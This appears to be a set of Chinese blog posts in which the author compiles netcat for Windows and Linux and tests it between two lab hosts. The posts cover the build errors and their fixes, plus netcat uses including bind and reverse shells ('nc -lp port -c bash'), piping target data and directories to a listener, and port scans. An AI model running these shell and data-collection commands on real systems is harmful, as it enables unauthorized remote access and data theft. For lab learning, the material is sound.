攻击工具-netcat windows版本编译I

windows make
1.babon
2.g++,gcc
3.vs2010
4.增加PATH
5.修改makefile中的4个空格->tab
6.make all -d 提示
   getopt.c(45) : fatal error C1034: stdio.h: 不包括路径集

  https://www.cnblogs.com/hiccup/p/5424009.html
  出现错误“fatal error C1034: stdio.h: no include path set”，解决方法是在环境变量中新建LIB和INCLUDE变量，在LIB中设置如下值：“E:\Program Files\Microsoft Visual Studio 10.0\VC\lib”；在INCLUDE中设置如下值：“E:\Program Files\Microsoft Visual Studio 10.0\VC\include”

7. make all -d 提示
   doexec.c(10) : fatal error C1083: 无法打开包括文件:“winsock2.h”: No such file or directory
   查找了一下在C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Include 中，手动添加到INCLUDE.

8. make all -d 提示
link: extra operand ‘netcat.obj’
解决:

https://stackoverflow.com/questions/19677870/error-in-assembly-masm-linker-link-extra-operand
查看babun的link whereis 发现没有使用windows的link ，
cp /cygdrive/c/Program\ Files\ \(x86\)/Microsoft\ Visual\ Studio\ 10.0/vc/bin/link.exe /usr/bin/



9.make all -d 提示
link getopt.obj doexec.obj netcat.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
Putting child 0x8004ca68 (nc.exe) PID 2600 on the chain.
Live child 0x8004ca68 (nc.exe) PID 2600
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored

LINK : fatal error LNK1104: cannot open file 'kernel32.lib'

Reaping losing child 0x8004ca68 PID 2600
makefile:21: recipe for target 'nc.exe' failed
Removing child 0x8004ca68 PID 2600 from chain.

makefile如下定义
lflags=kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe

nc.exe: getopt.obj doexec.obj netcat.obj
$(link) getopt.obj doexec.obj netcat.obj $(lflags)

查了一下三个lib的位置在C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Lib\x64
加了一下LINK变量位置
参考: https://msdn.microsoft.com/zh-cn/library/6y6t9esh.aspx
LINK 工具使用以下环境变量：
LIB（如已定义）。 当 LINK 工具搜索在命令行上指定的对象、库或其他文件时或通过 /base 选项进行搜索时会使用 LIB 路径。 它还可使用 LIB 路径查找在对象上命名的 .pdb 文件。 LIB 变量可以包含一个或多个路径规范，用分号分隔。 一个路径必须指向 Visual C++ 安装的 \lib 子目录


10.make all -d提示大量
link getopt.obj doexec.obj netcat.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored

doexec.obj : error LNK2019: unresolved external symbol _holler referenced in function _StartShell

LIBCMT.lib(lseeki64.obj) : error LNK2019: unresolved external symbol __imp__GetLastError@0 referenced in function __lseeki64_nolock

LIBCMT.lib(read.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(close.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(dup.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(tidtable.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(osfinfo.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(wctomb.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(realloc.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(commit.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(winsig.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(rand_s.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(inithelp.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

doexec.obj : error LNK2001: unresolved external symbol __imp__GetLastError@0

[popexizhi:
grep 了一下holler在netcat中定义, 而link先写的doexec.obj,不知是不是这个问题，所以调整了一下顺序为
nc.exe: getopt.obj doexec.obj netcat.obj
$(link) getopt.obj netcat.obj doexec.obj $(lflags)
]
11.调整顺序后make all -d提示大量
link getopt.obj netcat.obj doexec.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored

netcat.obj : error LNK2019: unresolved external symbol _WSACleanup@0 referenced in function _res_init

netcat.obj : error LNK2019: unresolved external symbol _WSAStartup@8 referenced in function _res_init

LIBCMT.lib(lseeki64.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(read.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(close.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(dup.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(tidtable.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(osfinfo.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(wctomb.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(realloc.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(commit.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(winsig.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(rand_s.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0

LIBCMT.lib(inithelp.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0


这个WSACleanup是中的参考:https://baike.baidu.com/item/WSACleanup()
查了一下原代码为winsock2.h的引入为
#ifdef __MINGW32__
#include <_mingw .h="">
#include
#endif

手动加入了
#ifdef __MINGW32__
#include <_mingw .h="">
#include
#endif

#include "generic.h" /* same as with L5, skey, etc */
#include
编译如下错误
link getopt.obj netcat.obj doexec.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored

netcat.obj : error LNK2019: unresolved external symbol __imp__WSACleanup@0 referenced in function _res_init

netcat.obj : error LNK2019: unresolved external symbol __imp__WSAStartup@8 referenced in function _res_init

LIBCMT.lib(lseeki64.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0


https://stackoverflow.com/questions/16948064/unresolved-external-symbol-lnk2019
#pragma comment(lib, "Ws2_32.lib")
查了一下这个Ws2_32.lib的位置，有三个自己之前再lib的定义中写的是x64用的，:).改成默认的C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Lib

12.调整lib后make all
出现如下问题:
link getopt.obj netcat.obj doexec.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored

netcat.obj : error LNK2019: unresolved external symbol _strcasecmp referenced in function _comparehosts

doexec.obj : error LNK2019: unresolved external symbol _holler referenced in function _StartShell

nc.exe : fatal error LNK1120: 2 unresolved externals

makefile:23: recipe for target 'nc.exe' failed

解决:https://github.com/osmcode/libosmium/issues/59
这个strcasecmp是linux方法，不是windows的，好吧。
在comparehosts使用strcasecmp使用前增加如下:
#ifdef _MSC_VER
#define strncasecmp _strnicmp
#define strcasecmp _stricmp
+#endif

13.调整lib后make all
出现如下问题:
doexec.obj : error LNK2019: unresolved external symbol _holler referenced in function _StartShell

nc.exe : fatal error LNK1120: 1 unresolved externals

makefile:23: recipe for target 'nc.exe' failed

分析:看来这个holler在StartShell使用没有定义，不是link的obj顺序问题。

攻击工具-linux nc 使用实验II

https://www.jianshu.com/p/cb26a0f6c622
IV)
NC传输文件/目录
nc -lp 4444 >1.txt 1.txt就是你要保存的文件名 自定义

nc -nv ip port <1 -q="" .txt="" 1="" p="">ps：侦听端的文件名最好按照文件本身来命名

V)nc目录
tar -cvf - 目录名/|nc -lp port -q 1
[popexizhi：很可惜，pope编译的nc没有-q命令，这个如果没有-q好像是收不了文件夹的]
将目录打包
nc -nv ip port |tar -xvf -
将目录解包

测试过程--可惜没有-q :)
# tar -cvf - data/|nc -lp 12222 -q 1
nc: invalid option -- 'q'
Ncat: Try `--help' or man(1) ncat for more information, usage options and help. QUITTING.
data/

VI)NC流媒体服务
A:cat wing.mp4|nc -lp port
B:nc -nv ip port |mplayer -vo x11 -cache 4000
A让wing.MP4这个文件成为流的形式发送到B，B用mplayer播放，接收多少播放多少，指定缓存4000bytes
[popexizhi：这个看着不错，但是没有找到mp4文件，回头有了可以测试一下]

VII)NC端口扫描
nc -nvz ip 1-65535
[popexizhi:好用的很，但是为什么 >直接保存不了数据呢？]
# ./nc -nvz 192.168.100.121 1000-1010>121-port
cannot connect to 192.168.100.121:1000 (192.168.100.121)
cannot connect to 192.168.100.121:1001 (192.168.100.121)
cannot connect to 192.168.100.121:1002 (192.168.100.121)
cannot connect to 192.168.100.121:1003 (192.168.100.121)
cannot connect to 192.168.100.121:1004 (192.168.100.121)
cannot connect to 192.168.100.121:1005 (192.168.100.121)
cannot connect to 192.168.100.121:1006 (192.168.100.121)
cannot connect to 192.168.100.121:1007 (192.168.100.121)
cannot connect to 192.168.100.121:1008 (192.168.100.121)
cannot connect to 192.168.100.121:1009 (192.168.100.121)
cannot connect to 192.168.100.121:1010 (192.168.100.121)
# ll
-rw-r--r--. 1 root root     0 9月  14 10:30 121-port

攻击工具-nc linux实验I

参考:https://www.jianshu.com/p/cb26a0f6c622

I)正向连接测试

NC远程控制
这个比较有意思，我放在第一。
正向连接
A:nc -lp port -c bash
B:nc ip port
A将自己的Bash发给B
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -lp 12222 -c bash
bash:行3: ipconfig: 未找到命令
bash:行4: $'\r': 未找到命令
bash:行7: $'p\b': 未找到命令


[121@netcat]# ./nc 192.168.100.120 12222
ls
nc
pwd
/root/tool/netcat
ipconfig
^M
ip add
1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:0c:29:a4:fb:01 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.120/24 brd 192.168.100.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fea4:fb01/64 scope link
       valid_lft forever preferred_lft forever
whoami
root
p^H
who
root     pts/0        2018-09-13 09:42 (192.168.88.66)
ps -ef|grep java
root      1262  1185  0 09:46 pts/0    00:00:01 java -jar fitnesse-standalone.jar
root      1330  1318  0 09:58 pts/0    00:00:00 grep java


II)反向连接
A:nc -lp port
B:nc ip port -c bash
B将自己的Bash发给A
win下Bash换成cmd
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -lp 12222
ip add
1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:50:56:b8:77:74 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.121/24 brd 192.168.100.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb8:7774/64 scope link
       valid_lft forever preferred_lft forever
who
root     pts/0        2018-09-13 09:43 (192.168.88.66)
[121 netcat]# ./nc 192.168.100.120 12222 -c bash

III) 发送文本信息
简单的建立连接，就是侦听模式和传输模式
nc -l -p port监听指定端口号
nc -nv ip port连接对方tcp端口，默认情况下，双方可以发送文本信息
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -l -p 12222
hi
ok ^H
hi121i^H^H^H
ok120iam121
[121 netcat]# ./nc -nv 192.168.100.120 12222
192.168.100.120:12222 (192.168.100.120) open
hi
ok
hi121i
ok120iami^H121
^C

IV)一次性数据收集
收集目标机上的进程信息
nc -l -p 4444 >wing.txt将远程发送过来的内容保存在本地
Ps aux |nc -nv ip port -q 1 标准输入完成后delay一秒钟，会发送到侦听端
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -l -p 12222 >wing.log
[120 netcat]# cat wing.log
root      2753  0.0  0.0 112720   972 pts/0    S+   10:20   0:00 grep --color=auto java

[121 netcat]# ps aux|grep java|./nc -nv 192.168.100.120 12222
192.168.100.120:12222 (192.168.100.120) open

攻击工具-netcat linux编译

源码地址:
https://github.com/bonzini/netcat

当前编译结果保存在: https://github.com/popexizhi/TreasureChest-/tree/attack-tool/nc
使用Makefile.am 和 configure.am编译，pope还是第一使用记录一下:
参考:https://blog.csdn.net/qq_19876131/article/details/51079068


$aclocal  #这里代码的根目录直接执行就可以，没有的 yum install automake
$autoconf  #同上直接执行就可以，autoconf会根据configure.in和aclocal.m4文件，生成configure文件
$automake --add-missing # automake会根据Makefile.am文件产生一些文件，包含最重要的Makefile.in。前面所生成的configure，会根据Makefile.in文件，来生成最终的Makefile文件，这里遇到问题记录到下面了
$./configure
$make all-am #编译完成后，当前目录有一个nc就可以使用了 :)
过程问题记录:

I.问题:
[root@lijie-121 netcat]# automake --add-missing
configure.ac:5: error: required file 'config.h.in' not found

解决: (https://github.com/stevedh/readingdb/issues/1)
[root@lijie-121 netcat]# autoreconf --install
[root@lijie-121 netcat]# automake --add-missing

II.问题
$make
...
/root/tool/netcat/config/missing:行81: makeinfo: 未找到命令
WARNING: 'makeinfo' is missing on your system.
         You should only need it if you modified a '.texi' file, or
         any other file indirectly affecting the aspect of the manual.
         You might want to install the Texinfo package:
         
         The spurious makeinfo call might also be the consequence of
         using a buggy 'make' (AIX, DU, IRIX), in which case you might
         want to install GNU make:
         
make[1]: *** [netcat.info] 错误 127
make[1]: 离开目录“/root/tool/netcat”
make: *** [all] 错误 2
解决: (https://blog.csdn.net/xuezhimeng2010/article/details/49070169)
yum install texinfo

攻击工具-netcat

nc的全称是netcat,介绍如下:

https://blog.csdn.net/xysoul/article/details/52270149
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)


http://netcat.sourceforge.net/

What is Netcat?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

当前找了一下源码，下一步打算编译并测试，先记录一下code的位置

window

https://github.com/diegocr/netcat

linux

http://netcat.sourceforge.net/

https://github.com/bonzini/netcat